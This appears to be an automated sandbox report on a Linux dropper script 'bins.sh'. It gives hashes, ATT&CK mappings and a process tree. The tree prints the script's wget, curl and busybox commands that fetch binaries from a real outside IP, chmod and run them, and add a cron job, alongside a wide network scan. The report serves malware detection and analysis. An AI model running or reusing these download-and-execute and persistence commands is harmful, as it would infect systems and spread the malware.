9a36958a4d26cded1d7d66285a93286e73a535ff7c20da542d734d8cc2f153d0

Analysis

max time kernel
150s
max time network
153s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
30-11-2024 16:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

ee91de469e47f5f54ebdfcf7ef65c3c6
SHA1

32d746051ea6c4a4e59a2aac00b2b4b280c6e9eb
SHA256

9a36958a4d26cded1d7d66285a93286e73a535ff7c20da542d734d8cc2f153d0
SHA512

95646d628867c5dd3bb1cda8620ee820a53eb67b39fcbaac0f348f8c0eb6e9663bdd2d521eb83bb2260b9fe33234cc5d37f5a09c0b04cc9db0e35dc4d6dc7b00
SSDEEP

96:rjYkn3/+UpxBJ8TaM/kn3cQH+188cPuYBJ86+NC/BKE:rjYkDBJ8TaMsBJ8JE

Score

9^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Contacts a large (1989) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmod

pid	Process
700	chmod

Executes dropped EXE 1 IoCs

Processes:

aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM

ioc	pid	Process
/tmp/aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM	702	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM

Renames itself 1 IoCs

Processes:

aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM

pid	Process
703	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.kCKf3d	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curl

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM

description	ioc	Process
File opened for reading	/proc/838/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/876/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/906/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/973/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/716/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/722/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/764/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/778/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/803/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/950/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/169/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/755/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/836/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/840/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/872/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/902/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/974/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/651/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/42/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/272/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/774/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/967/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/970/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/22/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/911/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/962/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/910/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/966/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/713/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/824/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/857/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/895/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/951/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/968/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/972/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/19/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/804/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/845/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/984/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/10/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/883/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/978/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/834/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/827/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/932/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/818/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/29/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/136/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/712/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/809/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/869/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/947/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/24/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/813/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/905/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/971/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/12/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/781/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/794/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/921/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/945/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/763/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/769/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
File opened for reading	/proc/831/cmdline	aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlbusybox

description	ioc	Process
File opened for modification	/tmp/aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM	wget
File opened for modification	/tmp/aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM	curl
File opened for modification	/tmp/aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:653
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:656
- /usr/bin/wget
  wget http://216.126.231.240/bins/aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
  2⤵
  - Writes file to tmp directory
  PID:661
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:684
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
  2⤵
  - Writes file to tmp directory
  PID:691
- /bin/chmod
  chmod 777 aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
  2⤵
  - File and Directory Permissions Modification
  PID:700
- /tmp/aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
  ./aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:702
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:704
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:706
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:707
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:709
- /bin/rm
  rm aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM
  2⤵
  PID:712
- /usr/bin/wget
  wget http://216.126.231.240/bins/WK7rsfBi3Z7mWLIJdz3lEzgXXKeJFsrqv1
  2⤵
  PID:716
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/WK7rsfBi3Z7mWLIJdz3lEzgXXKeJFsrqv1
  2⤵
  PID:718

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/aLcsnlXAcbZddHxLL4B8BuAQQXC2QE4meM

Filesize
177KB

MD5
786d75a158fe731feca3880f436082c0

SHA1
79ea2734e43d00cdeabed5586b2c1994d02aef3e

SHA256
5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

SHA512
7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Download Submit
/var/spool/cron/crontabs/tmp.kCKf3d

Filesize
210B

MD5
6a8265805d9a8eb692b403518cdcedd9

SHA1
1eef853ffea029a9fe723a2a646ea996515ecb79

SHA256
cf80c77e43e794e8f8894e9fe04f7fa7af26ad11d001bc196a9356fcc8505491

SHA512
b24a93eb1102647587d81f3cc4d3e245df2a4a27176e018a2714c089bc7c5c7737bffe3bd51cc4c597998882c27274e94f5a82699df91c447144f976380cb65d

Download Submit